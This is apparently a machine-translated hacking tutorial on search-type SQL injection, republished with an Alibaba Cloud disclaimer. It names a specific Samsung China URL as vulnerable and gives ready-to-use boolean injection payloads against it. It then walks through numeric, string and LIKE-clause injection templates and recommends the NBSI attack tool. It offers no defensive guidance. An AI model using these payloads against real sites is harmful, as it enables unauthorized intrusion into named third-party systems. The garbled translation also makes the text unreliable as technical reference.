Today, there's a search-type injection article that uses a new technology that detects Samsung: http://notebook.samsung.com.cn/index.aspx
The injection mode is:
General site Search is part of the match
The vulnerable URL is http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
Construct injection statement Samsung% ' and 1=1 and '% ' = '
Samsung% ' and 1=2 and '% ' = '
You see that? Two return pages are not the same description of injected vulnerability signature writing notebook is Samsung% ' and 1=1 and '% ' = ' return when some
We know that the general search code is written like this:
Select * from table name where field like '% keyword% '
This creates all the matches before and after the keyword (% is used to match all)
Here, if the keyword is not filtered, it can be constructed like this:
Keyword = ' and [query condition] and '%25 ' = '
So the query becomes
SELECT * from table name where field like '% ' and 1=1 and '% ' = '% '
This is a good composition of a SQL injection point, of course, with the hand can also be used NBSI can ~ ~
Injection is not separated, there is no need for what type of! ~
If you do not believe, please see the following "SQL into the Bible," the exact words
The first section, the general steps of SQL injection
First of all, judge the environment, look for the injection point, and judge the database type, which is already mentioned in the introductory article.
Secondly, according to the type of injection parameter, the original of the SQL statement is reconstructed in the mind, according to the type of parameter, it is divided into the following three kinds:
(A) The parameters of id=49 such injections are numeric, and the SQL statements are as follows:
Select * from table name where field =49
The injected parameter is id=49 and [query condition], that is, the build statement:
Select * from table name where field =49 and [query criteria]
(B) class= series The parameters of such injections are character types, and the original SQL statements are roughly as follows:
Select * from table name where field = ' Soap series '
The injected parameters are the class= series ' and [query conditions] and ' = ', that is, the generated statement:
Select * from table name where field = ' serials ' and [query conditions] and ' = '
(C) When the search does not filter the parameters, such as the keyword= keyword, the original SQL statement is roughly as follows:
Select * from table name where field like '% keyword% '
The injected parameter is keyword= ' and [query condition] and '%25 ' =, that is, the build statement:
Select * from table name where field like '% ' and [query condition] and '% ' = '% '
Of course, manual is trouble.
With tools, I suggest using NBSI tools better, I feel that only NBSI combined with this technology, other software is not injected
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.